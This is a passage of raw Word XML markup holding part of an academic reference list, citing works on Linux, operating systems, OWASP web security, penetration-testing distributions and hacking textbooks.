        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, M. Ivanovic, M. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Holbl</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Welzer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and M. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vidakovic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Adding security to the JavaScript-based agent middleware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SiebogJS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2018 41st International Convention on Information and Communication Technology, Electronics and Microelectronics, MIPRO 2018 - Proceedings</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10.23919/MIPRO.2018.8400088.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE5910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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">R. Khan and A. Das, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Build Better Chatbots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F8B0F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[21]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Protege Cloud Security, “OWASP - Code Event Injection,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Protego.io</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2020. [Online]. Available: https://www.protego.io/owasp-top-ten-serverless-attacks-sls-1-event-injection/. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA92F2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[22]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Owasp.org, “OWASP top 10 - 2017,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Https://Owasp.Org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">,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10.1002/kin.550040606.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37837D1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[23]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">OWASP, “OWASP,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OWASP.ORG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2015. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6351A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[24]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Y. N. Lien, “Operating systems,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Electrical Engineering Handbook</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4002C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[25]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Slideshare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “OS 3 Rings: Hardware, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kernal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Shell,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>slideshare.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2009. [Online]. Available: https://www.slideshare.net/anoochit/quick-guide-with-linux-command-line. [Accessed: 01-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B866D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[26]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">WordPress, “Concepts of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kernal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; Shell – Linux Information &amp; Scripting,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WordPress.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2020. [Online]. Available: https://kkslinuxinfo.wordpress.com/2015/12/02/concepts-of-kernal-shell/. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4DFCF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[27]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">W. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mauerer</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Linux ® Kernel Architecture</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EDF4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[28]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. E. Russinovich and D. a Solomon, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows Internals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC210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[29]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">MathWorks Inc., “Creating Graphical User Interfaces,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MATLAB User </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Guid</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2015,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10.2138/rmg.2005.58.22.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEB7C8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[30]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">I. H. Witten, E. Frank, and M. A. Hall, “The Command-Line Interface,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Data Mining: Practical Machine Learning Tools and Techniques</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1449D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t xml:space="preserve">G. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Beekmans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Linux From Scratch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2018.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461830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[32]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>L. Torvalds, “Linux: a portable operating system,” 1997.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEBF5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[33]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Red-Hat, “Red Hat Enterprise Linux operating system,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>redhat.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019. [Online]. Available: https://www.redhat.com/en/technologies/linux-platforms/enterprise-linux. [Accessed: 01-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5648B3F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[34]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Ubuntu, “Linux - Ubuntu Server,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ubuntu.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 2019. [Online]. Available: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://www.ubuntu.com/download/server. [Accessed: 23-Apr-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CE87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[35]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Offensive-Security, “Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: https://www.kali.org/. [Accessed: 23-May-2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDEFFF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[36]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Debian, “Debian -- The Universal Operating System,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>debian.org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2019. [Online]. Available: https://www.debian.org/. [Accessed: 01-May-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F4FD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[37]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">“The GNU General Public License,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sarbanes-Oxley IT Compliance Using COBIT and Open Source Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07760D0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[38]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Gartner, “Gartner Forecasts Worldwide Public Cloud Revenue to Grow 17.5 Percent in 2019,” 2019. [Online]. Available: https://www.gartner.com/en/newsroom/press-releases/2019-04-02-gartner-forecasts-worldwide-public-cloud-revenue-to-g. [Accessed: 30-Jan-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DD671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[39]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft, “Windows Server 2012 Administration Overview | Microsoft Press Store,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>micorsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> press store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2012. [Online]. Available: https://www.microsoftpressstore.com/articles/article.aspx?p=2201311. [Accessed: 14-Feb-2018].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C85F4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[40]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Garrels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Bash Guide for Beginners</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2004.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD028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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Conover, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hacking Exposed Linux : Linux Security Secrets and Solutions, Third Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38571B6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[42]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. Erickson, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hacking: The Art of Exploitation, 2nd Edition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C261B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[43]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. Neuhaus and B. Plattner, “Software security economics: Theory, in practice,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Economics of Information Security and Privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2013.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2C28B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[44]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Apache, “The Apache Software Foundation,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hadoop website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0521B50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[45]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">I. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ristic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Apache Security,” in </w:t>
      </w:r>
